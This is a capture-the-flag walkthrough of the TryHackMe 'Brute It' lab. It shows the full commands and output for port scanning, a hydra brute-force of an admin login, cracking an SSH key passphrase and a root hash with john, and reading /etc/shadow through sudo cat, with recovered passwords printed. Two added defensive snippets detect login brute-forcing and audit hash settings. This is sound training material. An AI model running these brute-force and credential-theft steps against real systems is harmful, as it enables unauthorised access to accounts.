# Brute It

**Date:** 09 November, 2021

**Author:** Dhaval Kotak

**Room:** [Brute It](https://tryhackme.com/room/bruteit)

## Reconnaissance

```shell
nanomite @ zeus in ~/thm/brute_it
⚡️ nmap -A 10.10.87.211 | tee nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-09 12:20 IST
Nmap scan report for 10.10.87.211
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
|   256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_  256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.48 seconds
```

How many ports are open?

**2**

What version of SSH is running?

**OpenSSH 7.6p1**

What version of Apache is running?

**2.4.29**

Which Linux distribution is running?

**Ubuntu**

Search for hidden directories on web server.

```shell
nanomite @ zeus in ~/thm/brute_it
⚡️ gobuster dir -u http://10.10.87.211 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.87.211
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/11/09 12:24:13 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.hta                 (Status: 403) [Size: 277]
/admin                (Status: 301) [Size: 312] [--> http://10.10.87.211/admin/]
/index.html           (Status: 200) [Size: 10918]                               
/server-status        (Status: 403) [Size: 277]                                 
                                                                                
===============================================================
2021/11/09 12:27:18 Finished
===============================================================
```

What is the hidden directory?

**/admin**

## Getting A Shell

Looking at the page source, we find a comment that gives away the username for the login form (and addresses john, who later turns out to be the SSH user):

```html
<!-- Hey john, if you do not remember, the username is admin -->
```

Now let's brute-force the login page with hydra:

```shell
nanomite @ zeus in ~/thm/brute_it
⚡️  hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.87.211 http-post-form "/admin/:user=^USER^&pass=^PASS^&Login=Login:Username or password invalid"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-09 12:33:04
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.87.211:80/admin/:user=^USER^&pass=^PASS^&Login=Login:Username or password invalid
[80][http-post-form] host: 10.10.87.211   login: admin   password: xavier
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-09 12:33:42
```

Explanation:

`-l admin` : The single username to try

`-P /usr/share/wordlists/rockyou.txt` : The password dictionary

`10.10.87.211` : The target IP

`http-post-form` : The hydra module to use (a login form submitted via HTTP POST)

`/admin/` : The path of the login form (first field of the module's colon-separated argument)

`user=^USER^&pass=^PASS^&Login=Login` : The POST body hydra sends; `^USER^` and `^PASS^` are replaced by the username and each candidate password, and `Login=Login` is the submit button's field

`Username or password invalid` : The string that marks a failed login; hydra reports a hit for the first response that does not contain it
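Seen from the defending side, a run like this leaves a very distinctive trace in the web server's access log: one source posting to the login path many times per minute. As an added example (not from the original writeup), the check below counts POSTs to `/admin/` per source IP over a sliding window on Apache combined-format log lines. The log lines, the IP addresses and the threshold are constructed assumptions for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache "combined" access log line (sample lines are constructed below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return ip/ts/method/path/status/ua for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def detect_login_bruteforce(lines, path="/admin/", window_s=60, threshold=20):
    """Map source IP -> peak number of POSTs to `path` inside any sliding
    `window_s`-second window, for sources that exceeded `threshold`."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent POSTs to `path`
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != path:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (q[-1] - q[0]).total_seconds() > window_s:
            q.popleft()               # forget attempts older than the window
        if len(q) > threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged

def sample_log(attempts=40):
    """Constructed log: one client POSTing to /admin/ once per second (the trace a
    hydra run like the one above leaves behind), plus one ordinary user."""
    base = datetime(2021, 11, 9, 12, 33, 4, tzinfo=timezone.utc)
    fmt = lambda t: t.strftime(TS_FMT)
    lines = [f'198.51.100.9 - - [{fmt(base)}] "GET /admin/ HTTP/1.1" 200 312 "-" "Mozilla/5.0"']
    for i in range(attempts):
        t = fmt(base + timedelta(seconds=i))
        lines.append(f'203.0.113.7 - - [{t}] "POST /admin/ HTTP/1.1" 200 1240 "-" "Mozilla/5.0"')
    t = fmt(base + timedelta(seconds=5))
    lines.append(f'198.51.100.9 - - [{t}] "POST /admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    return lines
```

The same counting, fed by `tail -f` on the real log, is enough to drive an alert or a temporary block; a real hydra run with 16 parallel tasks would cross the threshold within seconds.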

What is the user:password of the admin panel?

**admin:xavier**

Crack the RSA key you found.

```shell
nanomite @ zeus in ~/thm/brute_it
⚡️ sudo python3 /opt/john/ssh2John.py id_rsa > hash
nanomite @ zeus in ~/thm/brute_it
⚡️ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
rockinroll       (id_rsa)
1g 0:00:00:04 52.40% (ETA: 12:37:06) 0.2487g/s 1888Kp/s 1888Kc/s 1888KC/s hippy3245667
Session aborted
```

What is John's RSA Private Key passphrase?

**rockinroll**

User.txt

```shell
nanomite @ zeus in ~/thm/brute_it
⚡️ ssh john@10.10.87.211 -i id_rsa 
The authenticity of host '10.10.87.211 (10.10.87.211)' can't be established.
ECDSA key fingerprint is SHA256:6/bVnMDQ46C+aRgroR5KUwqKM6J9jAfSYFMQIOKckug.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.87.211' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Nov  9 07:09:27 UTC 2021

  System load:  0.0                Processes:           103
  Usage of /:   25.7% of 19.56GB   Users logged in:     0
  Memory usage: 39%                IP address for eth0: 10.10.87.211
  Swap usage:   0%


63 packages can be updated.
0 updates are security updates.


Last login: Wed Sep 30 14:06:18 2020 from 192.168.1.106
john@bruteit:~$ ls
user.txt
john@bruteit:~$ cat user.txt 
THM{REDACTED}
```

Web flag

**You will get the flag when you log in with the credentials found by hydra**

## Privilege Escalation

Find a form to escalate your privileges.

```shell
john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on bruteit:
    (root) NOPASSWD: /bin/cat
```

We can run `cat` as root without a password, so any file on the system is readable. Let's `cat` the `/etc/shadow` file.

```shell
john@bruteit:~$ sudo cat /etc/shadow
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
...
thm:$6$hAlc6HXuBJHNjKzc$NPo/0/iuwh3.86PgaO97jTJJ/hmb0nPj8S/V6lZDsjUeszxFVZvuHsfcirm4zZ11IUqcoB9IEWYiCV.wcuzIZ.:18489:0:99999:7:::
sshd:*:18489:0:99999:7:::
john:$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0:18490:0:99999:7:::
```
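Before handing the hashes to john, it is worth reading what the shadow entries themselves say about the machine's password policy. As an added example (not part of the original writeup), the audit below parses the root, daemon and john lines printed above, decodes the `$6$` sha512crypt format, fills in glibc's default of 5000 rounds when no `rounds=` field is present, converts the last-change day count to a date, and lists the things a hardening review would flag.

```python
import re
from datetime import date, timedelta

# Shadow entries as printed by `sudo cat /etc/shadow` above (root, daemon, john).
SHADOW_SAMPLE = """\
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
daemon:*:18295:0:99999:7:::
john:$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0:18490:0:99999:7:::
"""

ALGOS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
         "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}
# $<id>$[rounds=N$]<salt>$<hash>  (crypt(3) modular format)
HASH_RE = re.compile(r"^\$(?P<id>[^$]+)\$(?:rounds=(?P<rounds>\d+)\$)?(?P<salt>[^$]*)\$(?P<hash>.+)$")
EPOCH = date(1970, 1, 1)   # field 3 counts days since this date

def parse_shadow_entry(line):
    """Split one shadow(5) line into user, hash metadata and ageing fields."""
    f = line.rstrip("\n").split(":")
    if len(f) != 9:
        raise ValueError("expected 9 colon-separated fields")
    pw = f[1]
    e = {"user": f[0], "locked": pw.startswith(("!", "*")), "empty": pw == "",
         "hash_algo": None, "rounds": None, "salt": None,
         "last_changed": EPOCH + timedelta(days=int(f[2])) if f[2] else None,
         "max_age": int(f[4]) if f[4] else None}
    m = HASH_RE.match(pw)
    if m:
        e["hash_algo"] = ALGOS.get(m["id"], "unknown")
        e["salt"] = m["salt"]
        if e["hash_algo"] in ("sha256crypt", "sha512crypt"):
            # no rounds= field means glibc's default of 5000 iterations (john's "Cost 1")
            e["rounds"] = int(m["rounds"]) if m["rounds"] else 5000
    return e

def audit_shadow(text):
    """Return parsed entries, each with an `issues` list a hardening review would raise."""
    report = []
    for line in filter(str.strip, text.splitlines()):
        e = parse_shadow_entry(line)
        e["issues"] = [msg for cond, msg in (
            (e["empty"], "empty password"),
            (e["hash_algo"] == "md5crypt", "md5crypt hash"),
            (e["rounds"] is not None and e["rounds"] <= 5000, "default/low rounds"),
            (e["user"] == "root" and not e["locked"] and not e["empty"], "root login enabled"),
            (e["max_age"] is not None and e["max_age"] >= 99999, "password never expires"),
        ) if cond]
        report.append(e)
    return report
```

On this box every hash sits at the 5000-round default and root keeps a usable password, which is exactly why john gets through it in a few seconds below; raising `SHA_CRYPT_MIN_ROUNDS` in `/etc/login.defs` (or moving to yescrypt) and locking root's password are the corresponding fixes.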

Using john to crack the root hash. With no wordlist given, john falls back to its default modes: single-crack first, then its built-in `password.lst`, which is where `football` comes from:

```shell
nanomite @ zeus in ~/thm/brute_it
⚡️ john root-hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
football         (root)
1g 0:00:00:04 DONE 2/3 (2021-11-09 12:49) 0.2309g/s 711.3p/s 711.3c/s 711.3C/s 123456..john
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

What is the root's password?

**football**

root.txt

```shell
root@bruteit:/home/john# cd /root
root@bruteit:~# ls
root.txt
root@bruteit:~# cat root.txt 
THM{REDACTED}
root@bruteit:~# 
```
